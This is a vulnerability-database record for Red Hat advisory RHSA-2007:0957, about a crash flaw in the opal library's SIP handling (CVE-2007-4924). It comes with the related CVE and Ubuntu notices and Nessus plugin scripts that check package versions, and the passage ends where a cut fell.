ID RHSA-2007:0957 Type redhat Reporter RedHat Modified 2017-09-08T12:18:11
Description
Open Phone Abstraction Library (opal) is implementation of various
telephony and video communication protocols for use over packet based
networks.
In Red Hat Enterprise Linux 5, the Ekiga application uses opal.
A flaw was discovered in the way opal handled certain Session Initiation
Protocol (SIP) packets. An attacker could use this flaw to crash an
application, such as Ekiga, which is linked with opal. (CVE-2007-4924)
Users should upgrade to these updated opal packages which contain a
backported patch to correct this issue.
{"id": "RHSA-2007:0957", "hash": "0739a4750e00de49e0923c65bbbd318e", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2007:0957) Moderate: opal security update", "description": "Open Phone Abstraction Library (opal) is implementation of various\r\ntelephony and video communication protocols for use over packet based \r\nnetworks.\r\n\r\nIn Red Hat Enterprise Linux 5, the Ekiga application uses opal.\r\n\r\nA flaw was discovered in the way opal handled certain Session Initiation \r\nProtocol (SIP) packets. An attacker could use this flaw to crash an \r\napplication, such as Ekiga, which is linked with opal. (CVE-2007-4924)\r\n\r\nUsers should upgrade to these updated opal packages which contain a \r\nbackported patch to correct this issue.", "published": "2007-10-08T04:00:00", "modified": "2017-09-08T12:18:11", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://access.redhat.com/errata/RHSA-2007:0957", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2007-4924"], "lastseen": "2018-12-11T17:41:51", "history": [{"bulletin": {"id": "RHSA-2007:0957", "hash": "", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2007:0957) Moderate: opal security update", "description": "Open Phone Abstraction Library (opal) is implementation of various\r\ntelephony and video communication protocols for use over packet based \r\nnetworks.\r\n\r\nIn Red Hat Enterprise Linux 5, the Ekiga application uses opal.\r\n\r\nA flaw was discovered in the way opal handled certain Session Initiation \r\nProtocol (SIP) packets. An attacker could use this flaw to crash an \r\napplication, such as Ekiga, which is linked with opal. (CVE-2007-4924)\r\n\r\nUsers should upgrade to these updated opal packages which contain a \r\nbackported patch to correct this issue.", "published": "2007-10-08T04:00:00", "modified": "2016-05-19T22:34:56", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://access.redhat.com/errata/RHSA-2007:0957", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2007-4924"], "lastseen": "2016-09-04T11:17:54", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "affectedPackage": [{"packageVersion": "2.2.2-1.1.0.1", "packageName": "opal", "packageFilename": "opal-2.2.2-1.1.0.1.x86_64.rpm", "operator": "lt", "OSVersion": "any", "OS": "RedHat", "arch": "x86_64"}, {"packageVersion": "2.2.2-1.1.0.1", "packageName": "opal-devel", "packageFilename": "opal-devel-2.2.2-1.1.0.1.i386.rpm", "operator": "lt", "OSVersion": "any", "OS": "RedHat", "arch": "i386"}, {"packageVersion": "2.2.2-1.1.0.1", "packageName": "opal", "packageFilename": "opal-2.2.2-1.1.0.1.src.rpm", "operator": "lt", "OSVersion": "any", "OS": "RedHat", "arch": "src"}, {"packageVersion": "2.2.2-1.1.0.1", "packageName": "opal-devel", "packageFilename": "opal-devel-2.2.2-1.1.0.1.x86_64.rpm", "operator": "lt", "OSVersion": "any", "OS": "RedHat", "arch": "x86_64"}, {"packageVersion": "2.2.2-1.1.0.1", "packageName": "opal", "packageFilename": "opal-2.2.2-1.1.0.1.i386.rpm", "operator": "lt", "OSVersion": "any", "OS": "RedHat", "arch": "i386"}]}, "lastseen": "2016-09-04T11:17:54", "differentElements": ["affectedPackage", "modified"], "edition": 1}, {"bulletin": {"id": "RHSA-2007:0957", "hash": "", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2007:0957) Moderate: opal security update", "description": "Open Phone Abstraction Library (opal) is implementation of various\r\ntelephony and video communication protocols for use over packet based \r\nnetworks.\r\n\r\nIn Red Hat Enterprise Linux 5, the Ekiga application uses opal.\r\n\r\nA flaw was discovered in the way opal handled certain Session Initiation \r\nProtocol (SIP) packets. An attacker could use this flaw to crash an \r\napplication, such as Ekiga, which is linked with opal. (CVE-2007-4924)\r\n\r\nUsers should upgrade to these updated opal packages which contain a \r\nbackported patch to correct this issue.", "published": "2007-10-08T04:00:00", "modified": "2017-07-28T19:11:20", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://access.redhat.com/errata/RHSA-2007:0957", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2007-4924"], "lastseen": "2017-08-02T20:58:20", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "affectedPackage": [{"packageVersion": "2.2.2-1.1.0.1", "packageName": "opal-devel", "packageFilename": "opal-devel-2.2.2-1.1.0.1.x86_64.rpm", "arch": "x86_64", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}]}, "lastseen": "2017-08-02T20:58:20", "differentElements": ["affectedPackage", "modified"], "edition": 2}, {"bulletin": {"id": "RHSA-2007:0957", "hash": "19249c4c0699c3bbd2759c6e87198742", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2007:0957) Moderate: opal security update", "description": "Open Phone Abstraction Library (opal) is implementation of various\r\ntelephony and video communication protocols for use over packet based \r\nnetworks.\r\n\r\nIn Red Hat Enterprise Linux 5, the Ekiga application uses opal.\r\n\r\nA flaw was discovered in the way opal handled certain Session Initiation \r\nProtocol (SIP) packets. An attacker could use this flaw to crash an \r\napplication, such as Ekiga, which is linked with opal. (CVE-2007-4924)\r\n\r\nUsers should upgrade to these updated opal packages which contain a \r\nbackported patch to correct this issue.", "published": "2007-10-08T04:00:00", "modified": "2017-09-08T12:18:11", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://access.redhat.com/errata/RHSA-2007:0957", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2007-4924"], "lastseen": "2017-09-09T07:20:10", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "affectedPackage": [{"packageVersion": "2.2.2-1.1.0.1", "packageName": "opal", "packageFilename": "opal-2.2.2-1.1.0.1.i386.rpm", "arch": "i386", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.2.2-1.1.0.1", "packageName": "opal", "packageFilename": "opal-2.2.2-1.1.0.1.src.rpm", "arch": "src", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.2.2-1.1.0.1", "packageName": "opal", "packageFilename": "opal-2.2.2-1.1.0.1.x86_64.rpm", "arch": "x86_64", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.2.2-1.1.0.1", "packageName": "opal-devel", "packageFilename": "opal-devel-2.2.2-1.1.0.1.i386.rpm", "arch": "i386", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}, {"packageVersion": "2.2.2-1.1.0.1", "packageName": "opal-devel", "packageFilename": "opal-devel-2.2.2-1.1.0.1.x86_64.rpm", "arch": "x86_64", "operator": "lt", "OSVersion": "any", "OS": "RedHat"}]}, "lastseen": "2017-09-09T07:20:10", "differentElements": ["affectedPackage"], "edition": 3}], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-4924"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310830308", "OPENVAS:830308", "OPENVAS:840216"]}, {"type": "seebug", "idList": ["SSV:2279", "SSV:12762"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2007-0957.NASL", "SUSE_OPAL-4531.NASL", "MANDRAKE_MDKSA-2007-205.NASL", "SL_20071008_OPAL_ON_SL5_X.NASL", "CENTOS_RHSA-2007-0957.NASL", "UBUNTU_USN-562-1.NASL", "SUSE_OPAL-4519.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:9240"]}, {"type": "ubuntu", "idList": ["USN-562-1"]}, {"type": "centos", "idList": ["CESA-2007:0957"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:79577"]}], "modified": "2018-12-11T17:41:51"}, "vulnersScore": 5.0}, "objectVersion": "1.4", "affectedPackage": [{"OS": "RedHat", "OSVersion": "any", "arch": "i386", "packageName": "opal", "packageVersion": "2.2.2-1.1.0.1", "packageFilename": "opal-2.2.2-1.1.0.1.i386.rpm", "operator": "lt"}], "_object_type": "robots.models.redhat.RedHatBulletin", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2018-10-16T10:51:37", "bulletinFamily": "NVD", "description": "The Open Phone Abstraction Library (opal), as used by (1) Ekiga before 2.0.10 and (2) OpenH323 before 2.2.4, allows remote attackers to cause a denial of service (crash) via an invalid Content-Length header field in Session Initiation Protocol (SIP) packets, which causes a \\0 byte to be written to an \"attacker-controlled address.\"", "modified": "2018-10-15T17:38:50", "published": "2007-10-08T17:17:00", "id": "CVE-2007-4924", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4924", "title": "CVE-2007-4924", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:08:56", "bulletinFamily": "unix", "description": "Jose Miguel Esparza discovered that certain SIP headers were not correctly validated. A remote attacker could send a specially crafted packet to an application linked against opal (e.g. Ekiga) causing it to crash, leading to a denial of service.", "modified": "2008-01-08T00:00:00", "published": "2008-01-08T00:00:00", "id": "USN-562-1", "href": "https://usn.ubuntu.com/562-1/", "title": "opal vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:10:14", "bulletinFamily": "scanner", "description": "A bug in the SIP protocol handler could be exploited by attackers to crash applications using opal (CVE-2007-4924).", "modified": "2014-06-13T00:00:00", "id": "SUSE_OPAL-4531.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=27532", "published": "2007-10-24T00:00:00", "title": "openSUSE 10 Security Update : opal (opal-4531)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update opal-4531.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(27532);\n script_version (\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2014/06/13 20:31:04 $\");\n\n script_cve_id(\"CVE-2007-4924\");\n\n script_name(english:\"openSUSE 10 Security Update : opal (opal-4531)\");\n script_summary(english:\"Check for the opal-4531 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A bug in the SIP protocol handler could be exploited by attackers to\ncrash applications using opal (CVE-2007-4924).\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected opal packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:opal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:opal-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.2|SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.2 / 10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.2\", reference:\"opal-2.3.1-32\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"opal-devel-2.3.1-32\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"opal-2.2.8-60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"opal-devel-2.2.8-60.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"opal / opal-devel\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:12:52", "bulletinFamily": "scanner", "description": "Updated opal packages that fix a security issue are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nOpen Phone Abstraction Library (opal) is implementation of various telephony and video communication protocols for use over packet based networks.\n\nIn Red Hat Enterprise Linux 5, the Ekiga application uses opal.\n\nA flaw was discovered in the way opal handled certain Session Initiation Protocol (SIP) packets. An attacker could use this flaw to crash an application, such as Ekiga, which is linked with opal.\n(CVE-2007-4924)\n\nUsers should upgrade to these updated opal packages which contain a backported patch to correct this issue.", "modified": "2018-11-10T00:00:00", "id": "CENTOS_RHSA-2007-0957.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=43656", "published": "2010-01-06T00:00:00", "title": "CentOS 5 : opal (CESA-2007:0957)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0957 and \n# CentOS Errata and Security Advisory 2007:0957 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43656);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/10 11:49:28\");\n\n script_cve_id(\"CVE-2007-4924\");\n script_xref(name:\"RHSA\", value:\"2007:0957\");\n\n script_name(english:\"CentOS 5 : opal (CESA-2007:0957)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated opal packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nOpen Phone Abstraction Library (opal) is implementation of various\ntelephony and video communication protocols for use over packet based\nnetworks.\n\nIn Red Hat Enterprise Linux 5, the Ekiga application uses opal.\n\nA flaw was discovered in the way opal handled certain Session\nInitiation Protocol (SIP) packets. An attacker could use this flaw to\ncrash an application, such as Ekiga, which is linked with opal.\n(CVE-2007-4924)\n\nUsers should upgrade to these updated opal packages which contain a\nbackported patch to correct this issue.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-October/014290.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0ab05d08\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-October/014291.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?56b08ea4\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected opal packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:opal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:opal-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"opal-2.2.2-1.1.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"opal-devel-2.2.2-1.1.0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:10:37", "bulletinFamily": "scanner", "description": "Jose Miguel Esparza discovered that certain SIP headers were not correctly validated. A remote attacker could send a specially crafted packet to an application linked against opal (e.g. Ekiga) causing it to crash, leading to a denial of service.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-28T00:00:00", "id": "UBUNTU_USN-562-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=29918", "published": "2008-01-10T00:00:00", "title": "Ubuntu 6.06 LTS / 6.10 / 7.04 : opal vulnerability (USN-562-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-562-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(29918);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/28 11:42:05\");\n\n script_cve_id(\"CVE-2007-4924\");\n script_xref(name:\"USN\", value:\"562-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 6.10 / 7.04 : opal vulnerability (USN-562-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jose Miguel Esparza discovered that certain SIP headers were not\ncorrectly validated. A remote attacker could send a specially crafted\npacket to an application linked against opal (e.g. Ekiga) causing it\nto crash, leading to a denial of service.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/562-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libopal-2.2.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libopal-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libopal-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libopal-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:simpleopal\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.04\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/01/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2008-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06|6\\.10|7\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 6.10 / 7.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libopal-2.2.0\", pkgver:\"2.2.1-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libopal-dbg\", pkgver:\"2.2.1-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libopal-dev\", pkgver:\"2.2.1-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libopal-doc\", pkgver:\"2.2.1-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"simpleopal\", pkgver:\"2.2.1-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libopal-2.2.0\", pkgver:\"2.2.3.dfsg-0ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libopal-dbg\", pkgver:\"2.2.3.dfsg-0ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libopal-dev\", pkgver:\"2.2.3.dfsg-0ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libopal-doc\", pkgver:\"2.2.3.dfsg-0ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"simpleopal\", pkgver:\"2.2.3.dfsg-0ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"libopal-2.2.0\", pkgver:\"2.2.3.dfsg-2ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"libopal-dbg\", pkgver:\"2.2.3.dfsg-2ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"libopal-dev\", pkgver:\"2.2.3.dfsg-2ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"libopal-doc\", pkgver:\"2.2.3.dfsg-2ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"simpleopal\", pkgver:\"2.2.3.dfsg-2ubuntu2.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libopal-2.2.0 / libopal-dbg / libopal-dev / libopal-doc / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:17:03", "bulletinFamily": "scanner", "description": "In Scientific Linux 5, the Ekiga application uses opal.\n\nA flaw was discovered in the way opal handled certain Session Initiation Protocol (SIP) packets. An attacker could use this flaw to crash an application, such as Ekiga, which is linked with opal.\n(CVE-2007-4924)", "modified": "2019-01-07T00:00:00", "id": "SL_20071008_OPAL_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=60264", "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : opal on SL5.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60264);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/01/07 9:52:18\");\n\n script_cve_id(\"CVE-2007-4924\");\n\n script_name(english:\"Scientific Linux Security Update : opal on SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"In Scientific Linux 5, the Ekiga application uses opal.\n\nA flaw was discovered in the way opal handled certain Session\nInitiation Protocol (SIP) packets. An attacker could use this flaw to\ncrash an application, such as Ekiga, which is linked with opal.\n(CVE-2007-4924)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0710&L=scientific-linux-errata&T=0&P=542\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?700fce90\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected opal and / or opal-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< 